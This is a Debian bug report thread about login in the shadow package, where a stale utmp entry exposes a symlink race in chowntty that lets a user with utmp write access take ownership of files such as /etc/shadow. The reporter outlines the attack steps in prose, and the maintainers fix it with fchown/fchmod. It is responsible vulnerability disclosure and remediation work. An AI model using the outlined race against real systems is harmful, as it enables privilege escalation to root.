Debian Bug report logs - #505271
symlink attack in login leading to arbitrary file ownership

version graph

Package: login; Maintainer for login is Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>; Source for login is src:shadow.

Reported by: Paul Szabo <psz@maths.usyd.edu.au>

Date: Sun, 9 Nov 2008 07:33:01 UTC

Severity: serious

Tags: patch, security

Found in version shadow/1:4.0.18.1-7

Fixed in versions shadow/1:4.1.1-6, shadow/1:4.0.18.1-7+etch1

Done: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Sun, 09 Nov 2008 07:33:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
New Bug report received and forwarded. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 09 Nov 2008 07:33:04 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: login tty mis-determination (see bug#332198)
Date: Sun, 09 Nov 2008 18:26:39 +1100
Package: login
Version: 1:4.0.18.1-7
Severity: normal

(I wanted to send this to  332198@bugs.debian.org  but that was not
accepted, surely because that is closed/archived.)

I found in my logs (I think first occurrence of such mis-behaviour):

Nov  8 05:50:09 rome in.telnetd[21060]: connect from psz@bari.maths.usyd.edu.au (129.78.69.145) 
Nov  8 05:50:12 rome login[21062]: (pam_unix) session opened for user root by (uid=0) 
Nov  8 05:50:12 rome login[21062]: can't stat(`/dev/smb/39'): errno 2  
Nov  8 05:50:12 rome login[21062]: unable to determine TTY name, got /dev/smb/39  

Surely that Samba device is wrong for a telnet session...

Hope this helps in tacking down the cause of this bug.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.24-pk03.02-svr
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages login depends on:
ii  libc6                  2.3.6.ds1-13etch7 GNU C Library: Shared libraries
ii  libpam-modules         0.79-5            Pluggable Authentication Modules f
ii  libpam-runtime         0.79-5            Runtime support for the PAM librar
ii  libpam0g               0.79-5            Pluggable Authentication Modules l

login recommends no packages.

-- no debconf information




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Sun, 09 Nov 2008 12:09:15 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 09 Nov 2008 12:09:16 GMT) Full text and rfc822 format available.

Message #10 received at 505071@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: Paul Szabo <psz@maths.usyd.edu.au>, 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: login tty mis-determination (see bug#332198)
Date: Sun, 9 Nov 2008 13:06:30 +0100
Hello,

First of all, this issue was already discussed, and the main problem was
that we were not able to reproduce it.
Are you currently able to reproduce it?

That would help us a lot, since this would allow testing instrumentation
of login to find the root cause.

Would you agree testing some patches?

On Sun, Nov 09, 2008 at 06:26:39PM +1100, psz@maths.usyd.edu.au wrote:
> Package: login
> Version: 1:4.0.18.1-7
> Severity: normal
> 
> (I wanted to send this to  332198@bugs.debian.org  but that was not
> accepted, surely because that is closed/archived.)
> 
> I found in my logs (I think first occurrence of such mis-behaviour):
> 
> Nov  8 05:50:09 rome in.telnetd[21060]: connect from psz@bari.maths.usyd.edu.au (129.78.69.145) 
> Nov  8 05:50:12 rome login[21062]: (pam_unix) session opened for user root by (uid=0) 
> Nov  8 05:50:12 rome login[21062]: can't stat(`/dev/smb/39'): errno 2  
> Nov  8 05:50:12 rome login[21062]: unable to determine TTY name, got /dev/smb/39  
> 
> Surely that Samba device is wrong for a telnet session...

You logged in with telnet, right?

Do you know the version of telnet you are using?
Do you know if telnet creates a utmp entry before calling login?

What might be happening is that telnet do not create a utmp entry, and an
old one from samba is reused (in checkutmp). This should be very rare also
because the bug would occur only if the same pid is reused. 

Best Regards,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Sun, 09 Nov 2008 21:54:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 09 Nov 2008 21:54:04 GMT) Full text and rfc822 format available.

Message #15 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505071@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: [Pkg-shadow-devel] Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 10 Nov 2008 08:51:53 +1100
Dear Nicolas (Nekral?),

> First of all, this issue was already discussed, and the main problem was
> that we were not able to reproduce it.

Yes, I am aware of bug #332198.

> Are you currently able to reproduce it?

Have not yet attempted to actively reproduce, have observed one
occurrence of "spontaneous" bad behaviour.

> That would help us a lot, since this would allow testing instrumentation
> of login to find the root cause.
> Would you agree testing some patches?

Yes, would be happy to test.

>> I found in my logs (I think first occurrence of such mis-behaviour):
>> 
>> Nov  8 05:50:09 rome in.telnetd[21060]: connect from psz@bari.maths.usyd.edu.au (129.78.69.145) 
>> Nov  8 05:50:12 rome login[21062]: (pam_unix) session opened for user root by (uid=0) 
>> Nov  8 05:50:12 rome login[21062]: can't stat(`/dev/smb/39'): errno 2  
>> Nov  8 05:50:12 rome login[21062]: unable to determine TTY name, got /dev/smb/39  
>> 
>> Surely that Samba device is wrong for a telnet session...
>
> You logged in with telnet, right?
> Do you know the version of telnet you are using?
> Do you know if telnet creates a utmp entry before calling login?

Yes, with telnet; version 0.17-34 (debian etch); surely it cannot
possibly create utmp (telnet runs on bari, telnetd on rome).

> What might be happening is that telnet do not create a utmp entry, and an
> old one from samba is reused (in checkutmp). This should be very rare also
> because the bug would occur only if the same pid is reused. 

Yes, I agree that this is a re-use of an old "unclosed" utmp entry.
(Samba is in the habit of leaving such unclosed entries.) My logs show
(much earlier than the above-quoted lines):

Nov  7 00:52:02 rome samba[21062]: Connect IPC_ for smbguest from p706f (p706f.pc.maths.usyd.edu.au, 129.78.223.215) 

and I did not notice other utmp uses for the same PID in between.

---

Seems to me that the picking of utent in checkutmp by PID (and type?)
only is naive, should pick by line (or id) also, in fact pick by the
is_my_tty checks.

---

File src/login.c has line 87
  extern struct utmp utent;
whereas file libmisc/utmp.c has line 48
  struct utmp utent;
without extern: is that correct?

---

Other comments. Am worried that relying on utmp correctness is a
security risk: conceptually because group utmp would become
root-equivalent, and practically because of shenanigans with utmp
writing e.g. bugs #329156 #330907.

In file libmisc/chowntty.c :
- line 51: should the call
    (stat (tty, &by_name))
  be changed to lstat? Avoid being fooled by symlinks.
- line 66: is the check
    (by_name.st_rdev != by_fd.st_rdev)
  sufficient: can it be fooled with symlinks or hardlinks?
- lines 122,123: should chown(tty,...) and chmod(tty,...) be changed to
  fchown(0,...) and fchmod(0,...)? Avoid being fooled by symlinks and
  races.

Seems to me that as things stand, writing a suitable utmp entry, would
trick login into chowning an arbitrary file. Should I attempt to write
an exploit/demo?

---

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Sun, 09 Nov 2008 23:24:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 09 Nov 2008 23:24:05 GMT) Full text and rfc822 format available.

Message #20 received at 505071@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: Paul Szabo <psz@maths.usyd.edu.au>, 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 10 Nov 2008 00:20:56 +0100
Hi,

Thanks for your answer.
The culprit is now confirmed.

On Mon, Nov 10, 2008 at 08:51:53AM +1100, psz@maths.usyd.edu.au wrote:
> Dear Nicolas (Nekral?),
> 
> > First of all, this issue was already discussed, and the main problem was
> > that we were not able to reproduce it.
> 
> Yes, I am aware of bug #332198.
> 
> > Are you currently able to reproduce it?
> 
> Have not yet attempted to actively reproduce, have observed one
> occurrence of "spontaneous" bad behaviour.
> 
> > That would help us a lot, since this would allow testing instrumentation
> > of login to find the root cause.
> > Would you agree testing some patches?
> 
> Yes, would be happy to test.
> 
> >> I found in my logs (I think first occurrence of such mis-behaviour):
> >> 
> >> Nov  8 05:50:09 rome in.telnetd[21060]: connect from psz@bari.maths.usyd.edu.au (129.78.69.145) 
> >> Nov  8 05:50:12 rome login[21062]: (pam_unix) session opened for user root by (uid=0) 
> >> Nov  8 05:50:12 rome login[21062]: can't stat(`/dev/smb/39'): errno 2  
> >> Nov  8 05:50:12 rome login[21062]: unable to determine TTY name, got /dev/smb/39  
> >> 
> >> Surely that Samba device is wrong for a telnet session...
> >
> > You logged in with telnet, right?
> > Do you know the version of telnet you are using?
> > Do you know if telnet creates a utmp entry before calling login?
> 
> Yes, with telnet; version 0.17-34 (debian etch); surely it cannot
> possibly create utmp (telnet runs on bari, telnetd on rome).

Well, I meant telnetd should have inserted a utmp entry, on teh server
side.

> > What might be happening is that telnet do not create a utmp entry, and an
> > old one from samba is reused (in checkutmp). This should be very rare also
> > because the bug would occur only if the same pid is reused. 
> 
> Yes, I agree that this is a re-use of an old "unclosed" utmp entry.
> (Samba is in the habit of leaving such unclosed entries.) My logs show
> (much earlier than the above-quoted lines):
> 
> Nov  7 00:52:02 rome samba[21062]: Connect IPC_ for smbguest from p706f (p706f.pc.maths.usyd.edu.au, 129.78.223.215) 
> 
> and I did not notice other utmp uses for the same PID in between.
> 
> ---
> 
> Seems to me that the picking of utent in checkutmp by PID (and type?)
> only is naive, should pick by line (or id) also, in fact pick by the
> is_my_tty checks.

I agree with you that the utmp handling in shadow is not clean, and might
have a security implication.

I fear I won't have time to work on it in the next 2/3 weeks.

I think checking for the line might be good if the line is known, as well
as the user if possible.

> File src/login.c has line 87
>   extern struct utmp utent;
> whereas file libmisc/utmp.c has line 48
>   struct utmp utent;
> without extern: is that correct?

I think that's the expected behavior, however, I would prefer to avoid
such hidden communication between the modules.

> ---
> 
> Other comments. Am worried that relying on utmp correctness is a
> security risk: conceptually because group utmp would become
> root-equivalent, and practically because of shenanigans with utmp
> writing e.g. bugs #329156 #330907.
> 
> In file libmisc/chowntty.c :
> - line 51: should the call
>     (stat (tty, &by_name))
>   be changed to lstat? Avoid being fooled by symlinks.
> - line 66: is the check
>     (by_name.st_rdev != by_fd.st_rdev)
>   sufficient: can it be fooled with symlinks or hardlinks?
> - lines 122,123: should chown(tty,...) and chmod(tty,...) be changed to
>   fchown(0,...) and fchmod(0,...)? Avoid being fooled by symlinks and
>   races.
> 
> Seems to me that as things stand, writing a suitable utmp entry, would
> trick login into chowning an arbitrary file. Should I attempt to write
> an exploit/demo?

That would be nice to check if it would be possible to chown /etc/shadow
by cheating utmp.

A fake demo would be nice.
(by "fake demo", I mean that you do not have to find a way to guess the
PID, but can recompile a new login which use an hardcoded utmp entry in
checkutmp; that would be sufficient since we already know the utmp entry
selection is wrong and can be cheated)

I hope is_my_tty protects it, but I did not checked at all the complete
path.

Cheers,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 00:06:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 00:06:02 GMT) Full text and rfc822 format available.

Message #25 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505071@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 10 Nov 2008 11:04:12 +1100
Dear Nekral,

>> Seems to me that as things stand, writing a suitable utmp entry, would
>> trick login into chowning an arbitrary file. Should I attempt to write
>> an exploit/demo?
>
> That would be nice to check if it would be possible to chown /etc/shadow
> by cheating utmp.
>
> A fake demo would be nice.
> (by "fake demo", I mean that you do not have to find a way to guess the
> PID, but can recompile a new login which use an hardcoded utmp entry in
> checkutmp; that would be sufficient since we already know the utmp entry
> selection is wrong and can be cheated)
>
> I hope is_my_tty protects it, but I did not checked at all the complete
> path.

I expect the following would work:
Predict what PID and tty will be used by login. (This is rather simple:
surely the next available ones, maybe current tty.) For sake of example,
say these are PID=123 and tty=/dev/pts/1.
Pre-create a symlink  /tmp/x -> /dev/pts/1  and write an utmp entry
with PID=123, line=/tmp/x, type=LOGIN_PROCESS.
Run login. While login is running, change /tmp/x to point to /etc/shadow.
We win the race if the change is done after stat(tty,...) within
is_my_tty and before chown(tty,...) in chown_tty.

Hope this is sufficient...

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 10:24:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 10:24:05 GMT) Full text and rfc822 format available.

Message #30 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505071@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 10 Nov 2008 21:15:58 +1100
Dear Nekral,

I have not yet written an exploit/PoC/demo, but think it should be
rather easy to do. Looking at the recent DSA-1500 also, I ask you to
change the severity of this bug to "critical - root security hole",
and of course to fix things quickly. (I would change the severity
myself, but I think as a result of bug #299007 am not allowed.)

Thanks, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 11:39:13 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 11:39:13 GMT) Full text and rfc822 format available.

Message #35 received at 505071@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 10 Nov 2008 12:17:01 +0100
Hello,

I think there are two different bugs:

 * one is that login relies on the utmp entry with the current PID
   In my opinion, this cannot be exploited because is_my_tty will detect
   it.

 * The other one is that between is_my_tty and chown, there is a race
   condition.
   Changing chown (tty, ...) to fchown (0, ...) might work and might be
   sufficient.

The first bug is not critical.

The second one should be fixed for Lenny, but tested first.

Best Regards,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 23:21:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 23:21:11 GMT) Full text and rfc822 format available.

Message #40 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 07:36:18 +1100
Dear Nekral,

Curious way of counting bugs. What do you mean exploitable: to do what?
(Surely is_my_tty cannot protect, being buggy itself.)

As I see things, the following bugs are present:

- bad selection of utmp entry [often choosing wrong]
- is_my_tty uses stat [should be lstat]
- is_my_tty compares rdev only [should also test dev ino etc]
- maybe is_my_tty should scrutinize path [ensure directory components
  are root-owned and safe]
- race between is_my_tty checks and chown
- chown of unsafe path [should be fchown anyway]

As things are, it is exploitable to elevate privileges from group utmp
to root. It is also buggy, often failing for legitimate use. Fixing all
bugs would be best; fixing some may already render it "safe" against
exploitation, and/or restore functionality.

Please, fix soon. Please change severity.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 23:27:13 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 23:27:13 GMT) Full text and rfc822 format available.

Message #45 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 07:39:50 +1100
Dear Nekral,

Sorry, I missed your comment:

> ... should be fixed for Lenny ...

No. Should be fixed now, for etch. Needs a DSA.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Mon, 10 Nov 2008 23:54:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 10 Nov 2008 23:54:07 GMT) Full text and rfc822 format available.

Message #50 received at 505071@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 00:52:57 +0100
On Tue, Nov 11, 2008 at 07:36:18AM +1100, psz@maths.usyd.edu.au wrote:
> 
> Curious way of counting bugs. What do you mean exploitable: to do what?
> (Surely is_my_tty cannot protect, being buggy itself.)
> 
> As I see things, the following bugs are present:
> 
> - bad selection of utmp entry [often choosing wrong]

Often is arguable.
2 reports in 10 years.

> - is_my_tty uses stat [should be lstat]

I'm not sure lstat is right.
If the caller of login puts the name of a symbolic link for any reason in
utmp, I don't think that should be a failure.

> - is_my_tty compares rdev only [should also test dev ino etc]

I don't think the device or the inode is relevant.
If the major and minor of the device are identical, then they indicate the
same device.

> - maybe is_my_tty should scrutinize path [ensure directory components
>   are root-owned and safe]

Same as lstat, I don't think the paths have to match.

> - race between is_my_tty checks and chown

Yes.

> - chown of unsafe path [should be fchown anyway]

Except for the race, I don't think the path in unsafe.

> As things are, it is exploitable to elevate privileges from group utmp
> to root. It is also buggy, often failing for legitimate use. Fixing all
> bugs would be best; fixing some may already render it "safe" against
> exploitation, and/or restore functionality.

I currently think is_my_tty should be removed. checkutmp should check that
ut_line matches with the current tty, and return a file descriptor

Best Regards,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Tue, 11 Nov 2008 00:51:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Tue, 11 Nov 2008 00:51:07 GMT) Full text and rfc822 format available.

Message #55 received at 505071@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 11:47:53 +1100
Dear Nekral,

> Often is arguable.

Are not computers meant to be infallible and perfect?

---

Privileged programs should be strict on what they accept.

Paths are un-safe unless you verify that all directories above are
root-owned and not group or world writeable.

---

How you count bugs, how you fix the issues, is up to you (does not have
to be to my liking). Please fix soon, before someone writes an exploit.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505071; Package login. (Tue, 11 Nov 2008 11:04:37 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Tue, 11 Nov 2008 11:04:38 GMT) Full text and rfc822 format available.

Message #60 received at 505071@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: 505071@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 12:00:28 +0100
clone 505071 -1
retitle -1 symlink attack in login leading to arbitrary file ownership
tags -1 security
severity -1 serious
tags -1 patch
thanks

Somebody with write access to the utmp database can create the conditions
for a symlink attack in login, leading to gaining ownership of an
arbitrary file.

Proposed fix: Changing chown (tty, ...) to fchown (0, ...) in chowntty()

Best Regards,
-- 
Nekral




Bug 505071 cloned as bug 505271. Request was from Nicolas François <nicolas.francois@centraliens.net> to control@bugs.debian.org. (Tue, 11 Nov 2008 11:04:39 GMT) Full text and rfc822 format available.

Changed Bug title to `symlink attack in login leading to arbitrary file ownership' from `login tty mis-determination (see bug#332198)'. Request was from Nicolas François <nicolas.francois@centraliens.net> to control@bugs.debian.org. (Tue, 11 Nov 2008 11:04:41 GMT) Full text and rfc822 format available.

Tags added: security Request was from Nicolas François <nicolas.francois@centraliens.net> to control@bugs.debian.org. (Tue, 11 Nov 2008 11:04:42 GMT) Full text and rfc822 format available.

Severity set to `serious' from `normal' Request was from Nicolas François <nicolas.francois@centraliens.net> to control@bugs.debian.org. (Tue, 11 Nov 2008 11:04:43 GMT) Full text and rfc822 format available.

Tags added: patch Request was from Nicolas François <nicolas.francois@centraliens.net> to control@bugs.debian.org. (Tue, 11 Nov 2008 11:04:46 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Tue, 11 Nov 2008 12:15:09 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Tue, 11 Nov 2008 12:15:09 GMT) Full text and rfc822 format available.

Message #75 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505071@bugs.debian.org, 505271@bugs.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#505071: login tty mis-determination (see bug#332198)
Date: Tue, 11 Nov 2008 23:13:21 +1100
Dear Nekral,

> Proposed fix: Changing chown (tty, ...) to fchown (0, ...) in chowntty()

Surely you meant to change chmod to fchmod also. (I know this is
nit-picking, but best to be sure...)

Thanks, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Fri, 14 Nov 2008 09:45:20 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Fri, 14 Nov 2008 09:45:23 GMT) Full text and rfc822 format available.

Message #80 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Fri, 14 Nov 2008 20:33:43 +1100
Dear Nekral,

Long ago you wrote:

>> ... Should I attempt to write an exploit/demo?
> That would be nice to check if it would be possible to chown
> /etc/shadow by cheating utmp.

Done, I now have a working PoC/demo/exploit ... am not yet releasing
it publicly.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sat, 22 Nov 2008 10:48:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sat, 22 Nov 2008 10:48:06 GMT) Full text and rfc822 format available.

Message #85 received at 505271@bugs.debian.org (full text, mbox):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sat, 22 Nov 2008 11:41:31 +0100
On Fri, Nov 14, 2008 at 08:33:43PM +1100, Paul Szabo wrote:
> Dear Nekral,
> 
> Long ago you wrote:
> 
> >> ... Should I attempt to write an exploit/demo?
> > That would be nice to check if it would be possible to chown
> > /etc/shadow by cheating utmp.
> 
> Done, I now have a working PoC/demo/exploit ... am not yet releasing
> it publicly.

What's the status? Could you verify that Nicolas' patch fixes the
problem?

Cheers,
        Moritz




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sat, 22 Nov 2008 11:06:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sat, 22 Nov 2008 11:06:02 GMT) Full text and rfc822 format available.

Message #90 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: jmm@inutil.org
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sat, 22 Nov 2008 22:03:39 +1100
Dear Moritz,

Yes, Nicolas's patch does fix the problem. But please note:
(1) It is my patch, not Nicolas's, was first proposed in
    http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505071#15
(2) There is no such patch, nobody has made a "diff" file,
    much less a compiled/built package to try.

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Reply sent to Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>:
You have taken responsibility. (Sat, 22 Nov 2008 18:24:11 GMT) Full text and rfc822 format available.

Notification sent to Paul Szabo <psz@maths.usyd.edu.au>:
Bug acknowledged by developer. (Sat, 22 Nov 2008 18:24:11 GMT) Full text and rfc822 format available.

Message #95 received at 505271-close@bugs.debian.org (full text, mbox):

From: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
To: 505271-close@bugs.debian.org
Subject: Bug#505271: fixed in shadow 1:4.1.1-6
Date: Sat, 22 Nov 2008 18:02:03 +0000
Source: shadow
Source-Version: 1:4.1.1-6

We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:

login_4.1.1-6_i386.deb
